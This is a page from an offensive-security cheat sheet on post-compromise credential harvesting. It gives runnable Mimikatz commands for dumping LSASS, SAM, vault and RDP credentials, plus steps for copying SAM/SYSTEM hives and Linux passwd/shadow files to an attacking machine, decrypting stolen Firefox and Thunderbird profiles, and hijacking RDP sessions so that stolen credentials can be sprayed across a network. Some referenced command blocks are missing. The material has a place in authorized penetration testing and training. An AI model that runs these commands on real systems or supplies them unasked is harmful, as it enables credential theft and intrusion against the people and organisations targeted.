Get Credentials
After compromising a target is important to recollect the maximum credentials to spray them on the network.
Looking for Interesting Files
If the target have a web application that use a database try to find the config.php file in order to obtain the database connection.
Look what type of applications are installed and look for config files in order to find new pair of creds.
Mimikatz
Dump all cached logon credentials, SAM, System, LSASS, VAULT....
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords full
sekurlsa::wdigest
sekurlsa::credman
lsadump::sam
vault::cred
vault::list
ts::mstsc
ts::sessions
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords full" "sekurlsa::wdigest" "sekurlsa::credman" "lsadump::sam" "vault::cred" "vault::list" "ts::mstsc" "exit"Note: if sekurlsa::logoncredentials does not work in Windows 10 or Server 2019 download a older realease.
Hijacking RDP Session
To hijack a RDP session we need mimikatz.
SAM and SYSTEM (Win)
You can easily dump the SAM and SYSTEM registries using the command prompt. Just open the cmd.exe as Administrator and run the following commands:
Finally on our kali we just need to use sam2dump to get the hashes.
PASSWD and SHADOW (Lin)
Same as Windows, when we pwn a privilege user such as root we can get system users and passwords. In linux we just need to copy the following files to our attacking machine.
Finally on our kali machine we just need to use unshadow to get the hashes:
Mozilla Firefox / Thunderbird / WaterFox / SeaMonkey
Some users victims uses Mozilla Firefox or Mozilla Thunderbird and stores their credentials without protection.
On windows search the following route:
Zip the content of Firefox or Thunderbird folder and transfer it to the attacking machine. Once transferred we are going to use firefox-decrypt tool to get the plaintext credentials.
Last updated
Was this helpful?